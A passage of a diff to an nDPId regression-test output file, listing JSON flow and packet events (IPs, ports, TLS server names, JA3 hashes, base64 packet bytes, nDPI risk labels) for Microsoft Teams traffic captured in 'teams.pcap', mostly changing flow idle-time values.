+01289{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"teams.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1587041682745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":665,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":665,"pkt_l4_len":631,"thread_ts_msec":1587041682745,"pkt":"EBMx8Tl2KDc3AG3ICABFAAKLAABAAEAGwL7AqAEGon0Tg+u4AbuLprsOEqsiiIAYEAA0LgAAAQEICjCEr+ORzaKrFwMDAlK2BaXSajSAVWEKj3frXxijYpT3GD2Cuos6bxaeeEb0O6UJhzmzPZI\/SWy+fgBnTfneCwusduYkx4s3F4xCn2MY3DEvpr\/P48ATzKlJ++OHqI7OI3KpokJ1bF8YwJjJpFyWkPT0\/gdDA2C0thwexYlLgVCHe4dECfAKO3ai6a9AkpIGftSCmWnSsB7\/GodcDd1wDIWHn+mS6A9bTO\/2sRCfLQjmwaqnM\/0Kd1DorrQMm9TT6\/w11NzOyGJGqVRWfthWKCJ2r5CEFaogXR64MxPpr2FM6spcuDUY4C3Hc53Q7uc97BndljPBEgsGGu2WIs1hpBKyBrbp4cakeWFrgRHILDge\/JLjoB\/we0ie6rPfHdzAzbH+CVHboc7ECVvIV6N2Rd\/z5fI6cJ5y1i\/CGpe9JS\/DjF+npNlL3gVvBs3y7VpT4ziTRBRlbzG6hzfaYWVE\/I1GNwloup0kRP0\/\/fFg59buQBmTxdHJsfm4laPDQEGg2\/E9TD5wbcmagME1tYB8Z6HaDDAe1MbrBXtLSM8VMS0ZeI23LZfgw6dIscXGQh+EZCVohYQ2K\/dCOtZqYIGlXsZd11O+bX\/KPVaVnsGCQqimWVbYkJXTdkE5fdL4ibwUdj8vI7+8IXUv8oArxAdVEWB2+pth6d9Zti7C4SxMlmajA50jkJHElO8G4w6Wzb86qkyK4WbkuYLazUSRxEvrQrVtZjtDDcEAhbB3i\/CCiXoyK9403MAI7UV+NXn0+Iqmacnoi+GSVKkccDjbrlFQ3qxHSBpnh\/Zt22FSB4TV4eA="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682809,"flow_last_seen":1587041682809,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682809,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1249,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1587041682809,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682809,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyCEVImrEWfAAAAALAC\/\/+rgAAAAgQFtAEDAwUBAQgKMISwIQAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1587041682862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682862,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7ILLfLe3JqxFoKAS\/ogNbwAAAgQFrAQCCAoTeRnVMISwIQEDAwc="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1299,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1587041682862,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682862,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyCEVImrEWgy3y3uIAQECwqYQAAAQEICjCEsFATeRnV"} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1300,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682809,"flow_last_seen":1587041682863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041682863,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1345,"source":"teams.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041682809,"flow_last_seen":1587041682917,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041682917,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60546,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00873{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1439,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682698,"flow_last_seen":1587041683109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9547,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1587041683109,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"presence.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1587041683142,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1587041683142,"pkt":"EBMx8Tl2KDc3AG3ICABFAABOVgkAAP8R4j3AqAEGwKgBAeCgADUAOmwyTTEBAAABAAAAAAAACmNoYXRzdmNhZ2cEc3ZjcwV0ZWFtcwZvZmZpY2UDY29tAAABAAE="} 00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683142,"flow_last_seen":1587041683142,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041683142,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1587041683184,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1587041683184,"pkt":"KDc3AG3IEBMx8Tl2CABFAADQTcNAADkRcALAqAEBwKgBBgA14KAAvAAATTGBgAABAAMAAAAACmNoYXRzdmNhZ2cEc3ZjcwV0ZWFtcwZvZmZpY2UDY29tAAABAAHADAAFAAEAAAAMACoVdGVhbXMtY2hhdHN2Y2FnZy1wcm9kDnRyYWZmaWNtYW5hZ2VyA25ldADAPgAFAAEAAAEsADAWbXNnLXVrc28tMDEtY2hhdHN2Y2FnZwd1a3NvdXRoCGNsb3VkYXBwBWF6dXJlwCnAdAABAAEAAAAFAAQ0clg7"} 00804{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1452,"source":"teams.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041683142,"flow_last_seen":1587041683184,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041683184,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":57504,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"chatsvcagg.svcs.teams.office.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.88.59"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683186,"flow_last_seen":1587041683186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041683186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1587041683186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041683186,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7FzAqAEGNHJYO+yDAbslAEUuAAAAALAC\/\/+uKgAAAgQFtAEDAwUBAQgKMISxhQAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1587041683220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8HR9AAG0GokE0clg7wKgBBgG77INQlxoFJQBFL6ASIAAufwAAAgQFoAEDAwgEAggKAdQEQDCEsYU="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1587041683220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7GjAqAEGNHJYO+yDAbslAEUvUJcaBoAQEAltDgAAAQEICjCEsaYB1ARA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683186,"flow_last_seen":1587041683220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041683220,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683333,"flow_last_seen":1587041683333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041683333,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1587041683333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041683333,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyEAbsX4foHAAAAALAC\/\/8Q\/AAAAgQFtAEDAwUBAQgKMISyEgAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1587041683378,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683378,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VAJAAGwGd3g0ck0hwKgBBgG77IQbiSB\/F+H6CKASIABpjQAAAgQFoAEDAwgEAggKYR77TDCEshI="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1587041683379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683379,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyEAbsX4foIG4kggIAQEAmoEAAAAQEICjCEsj9hHvtM"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1495,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683333,"flow_last_seen":1587041683379,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041683379,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683186,"flow_last_seen":1587041683186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041683186,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1587041683186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041683186,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7FzAqAEGNHJYO+yDAbslAEUuAAAAALAC\/\/+uKgAAAgQFtAEDAwUBAQgKMISxhQAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1587041683220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8HR9AAG0GokE0clg7wKgBBgG77INQlxoFJQBFL6ASIAAufwAAAgQFoAEDAwgEAggKAdQEQDCEsYU="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1587041683220,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7GjAqAEGNHJYO+yDAbslAEUvUJcaBoAQEAltDgAAAQEICjCEsaYB1ARA"} +00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683186,"flow_last_seen":1587041683220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1587041683220,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041683333,"flow_last_seen":1587041683333,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041683333,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1492,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1587041683333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041683333,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyEAbsX4foHAAAAALAC\/\/8Q\/AAAAgQFtAEDAwUBAQgKMISyEgAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1493,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1587041683378,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041683378,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VAJAAGwGd3g0ck0hwKgBBgG77IQbiSB\/F+H6CKASIABpjQAAAgQFoAEDAwgEAggKYR77TDCEshI="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1494,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1587041683379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041683379,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyEAbsX4foIG4kggIAQEAmoEAAAAQEICjCEsj9hHvtM"} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1495,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041683333,"flow_last_seen":1587041683379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041683379,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041683406} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1499,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041683396,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1503,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041683333,"flow_last_seen":1587041683431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041683431,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} -00876{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1516,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10374,"flow_avg_l4_payload_len":324,"midstream":0,"thread_ts_msec":1587041683511,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"chatsvcagg.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1503,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041683333,"flow_last_seen":1587041683431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041683431,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 